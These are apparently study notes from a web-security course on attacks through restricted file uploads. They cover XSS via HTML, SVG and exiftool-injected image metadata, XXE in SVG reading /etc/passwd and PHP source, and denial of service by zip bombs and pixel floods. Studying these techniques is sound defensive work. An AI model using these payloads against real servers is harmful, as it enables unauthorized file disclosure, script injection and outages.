
Limited File Uploads

  • Certain file types, like SVG, HTML, XML, and even some image and document files, may allow us to introduce new vulnerabilities to the web application by uploading malicious versions of these files. This is why fuzzing allowed file extensions is an important exercise for any file upload attack: it enables us to explore what attacks may be achievable on the web server.

XSS

  • When the web server allows HTML file uploads.
  • Page execution does not take place on the server as with PHP, but the browser still renders the uploaded HTML.
  • We can write JS code in the file to carry out XSS/CSRF against whoever visits the uploaded HTML page.
  • Web app that displays an image's metadata after its upload:
    • include the XSS payload in one of the metadata fields.
      • exiftool -Comment=' "><img src=1 onerror=alert(window.origin)>' HTB.jpg
      • Check: exiftool HTB.jpg
  • With SVG (Scalable Vector Graphics) images:
    • they are XML-based images that describe 2D vector graphics, which the browser renders to an image (so any script inside them is executed).
    • eg:
      <?xml version="1.0" encoding="UTF-8"?>
      <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
      <svg xmlns="http://www.w3.org/2000/svg" version="1.1" width="1" height="1">
          <rect x="1" y="1" width="1" height="1" fill="green" stroke="black" />
          <script type="text/javascript">alert(window.origin);</script>
      </svg>

XXE

  • SVG can be injected with a malicious XXE payload to elicit information.
  • eg payload:
    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
    <svg>&xxe;</svg>
  • Getting system information is critical in exploitation.
  • For File Upload exploitation, it may allow us to locate the upload directory, identify allowed extensions, or find the file naming scheme, which may become handy for further exploitation.
  • eg payload to read source code (uses File Inclusion knowledge, the php://filter wrapper):
    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
    <svg>&xxe;</svg>

DoS

  • DoS using XXE.
  • Decompression Bomb using ZIP archives:
    • If a web application automatically unzips a ZIP archive, it is possible to upload a malicious archive containing nested ZIP archives within it, which can eventually lead to many Petabytes of data, resulting in a crash on the back-end server.
  • Pixel Flood attack with some image files that utilize image compression, like JPG or PNG. We can create any JPG image file with any image size (e.g. 500x500), and then manually modify its compression data to say it has a size of 0xffff x 0xffff, which results in an image with a perceived size of 4 Gigapixels. When the web application attempts to display the image, it will attempt to allocate all of its memory to this image, resulting in a crash on the back-end server.
  • Large file uploads.
  • Directory traversal.